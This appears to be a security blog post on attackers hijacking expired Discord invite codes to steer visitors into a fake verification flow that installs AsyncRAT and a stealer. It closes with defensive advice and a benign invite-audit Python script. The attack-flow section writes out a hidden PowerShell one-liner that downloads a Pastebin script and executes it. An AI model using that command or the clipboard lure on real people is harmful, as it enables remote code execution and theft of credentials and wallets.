A Discord invite you embedded in a blog post, social‑media thread, or product FAQ last year may no longer point to the community you intended. Because Discord allows boosted servers to re‑claim expired or deleted vanity codes, threat actors hijack abandoned Discord invites, attach them to their own servers, and funnel visitors into a slick, but malicious, “verification” flow.
Check Point Research revealed the campaign in June 2025, observing it deliver AsyncRAT and a customised Skuld Stealer that targets browser cookies and crypto‑wallet seed phrases. Every hop – Discord, GitHub, Bitbucket, Pastebin – uses a trusted cloud service, giving the traffic a clean bill of health at most network edges.
What’s new & why it matters
- Invite‑code reuse loophole: Boosted servers can register any unused code, including one that previously belonged to another community, as a custom vanity URL.
- Dormant links weaponised: Old tweets, forum posts, or landing pages that still point to discord.gg/<code> now act as malware distribution channels.
- Cloud‑native evasion: Every payload stage sits on Discord, Pastebin, GitHub, or Bitbucket, making the traffic look legitimate.
- Victim profile: The lure targets gamers, crypto traders, and developer communities with high search‑engine visibility.
Step‑by‑step attack flow
- Invite hijack: Attackers monitor expiring Discord codes and register them as vanity URLs. A Reddit thread that once linked to a popular modding server now redirects to the attacker’s server.
- Fake verification page (ClickFix): The server shows only a locked #verify channel. A bot button opens captchaguard[.]me, which silently copies a PowerShell one‑liner to the clipboard and claims the CAPTCHA failed: “paste this command into Run to continue”. The copied command is:
  powershell -nop -w hidden -c "iwr -UseBasicParsing https://pastebin.com/raw/abcd1234 | iex"
- PowerShell loader: The one‑liner fetches an unobfuscated script from Pastebin that downloads installer.exe from GitHub and sleeps for 15 minutes to evade sandboxes.
- Staged payload chain: installer.exe drops a VBScript (runsys.vbs) and schedules it to run every five minutes. The script XOR‑decrypts blobs from a Bitbucket repo, finally launching AsyncRAT and a stripped‑down Skuld Stealer.
- Exfiltration & persistence: Stolen cookies, tokens, and wallet seeds are zipped and sent to a Discord webhook. A scheduled task (checker) re‑downloads the payload if removed.
Impact on brands & communities
- Brand trust erosion: Users quickly lose faith in communities whose invites suddenly lead to malware.
- SEO poisoning: High‑ranking pages that embed hijacked invites funnel traffic to malicious servers, indirectly harming site authority.
- Wallet & PII theft: Skuld Stealer targets Chromium cookies and Exodus/Atomic wallet data; AsyncRAT gives attackers full remote control.
How to protect your links
For Discord server owners & community managers
- Run a search‑engine site audit (for example, the query site:yourdomain.com discord.gg) to surface old links.
- Replace or redirect outdated invites and add a banner on legacy posts with the new code.
- Disable vanity URLs if you can’t maintain Level‑3 boosts.
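To make the audit above repeatable, here is an added example script (not from the original post or from Check Point) that pulls every Discord invite code out of a page’s HTML and checks whether each code still resolves to your own guild, has expired (and is therefore eligible for re‑registration by someone else), or now points at a foreign guild. It uses Discord’s public invite lookup endpoint; the sample page, guild ids and the offline resolver are constructed for illustration.

```python
import json
import re
import urllib.error
import urllib.request

# Matches discord.gg/<code>, discord.com/invite/<code> and discordapp.com/invite/<code>.
INVITE_RE = re.compile(
    r"https?://(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)",
    re.IGNORECASE,
)

def extract_invite_codes(text):
    """Return the unique invite codes found in a page, in first-seen order."""
    seen = []
    for code in INVITE_RE.findall(text):
        if code not in seen:
            seen.append(code)
    return seen

def resolve_invite_live(code):
    """Look up a code via Discord's public invite endpoint (needs network access).
    Returns the id of the guild the code currently points at, or None if Discord
    reports the invite as unknown or expired."""
    url = f"https://discord.com/api/v10/invites/{code}"
    req = urllib.request.Request(url, headers={"User-Agent": "invite-audit/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            data = json.load(resp)
    except urllib.error.HTTPError as exc:
        if exc.code == 404:
            return None
        raise
    return (data.get("guild") or {}).get("id")

def audit_invites(text, expected_guild_id, resolve=resolve_invite_live):
    """Classify every invite on a page as 'ok' (still ours), 'dead' (expired, so
    re-registrable as a vanity URL by a boosted server) or 'foreign' (already
    resolves to a different guild). `resolve` can be swapped for an offline lookup."""
    report = {}
    for code in extract_invite_codes(text):
        guild_id = resolve(code)
        report[code] = "dead" if guild_id is None else ("ok" if guild_id == expected_guild_id else "foreign")
    return report

# Constructed sample page and offline directory; guild ids are placeholders.
SAMPLE_PAGE = """<p>Join us: https://discord.gg/modding-hub</p>
<a href="https://discord.com/invite/Ab12Cd">old link</a>
<p>Archived: https://discord.gg/legacy2019 and again https://discord.gg/modding-hub</p>"""
FAKE_DIRECTORY = {"modding-hub": "111", "Ab12Cd": "999"}  # legacy2019 absent = expired

if __name__ == "__main__":
    print(audit_invites(SAMPLE_PAGE, "111", resolve=FAKE_DIRECTORY.get))
```

Any code reported as "dead" should be re‑registered or the page updated before a boosted server claims it; a "foreign" result means the link is already sending visitors elsewhere.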
For end‑users
- Treat any request to paste a command from your clipboard as a red flag.
- Use hardware 2FA keys and separate browser profiles for high‑value crypto tasks.
Final Thoughts
Hijacked Discord invites transform once‑trusted community links into high‑credibility malware conduits. Auditing published content, regenerating permanent invites, and training users to spot clipboard‑based scams can collapse the entire attack chain with minimal effort. Stay vigilant to stay safe!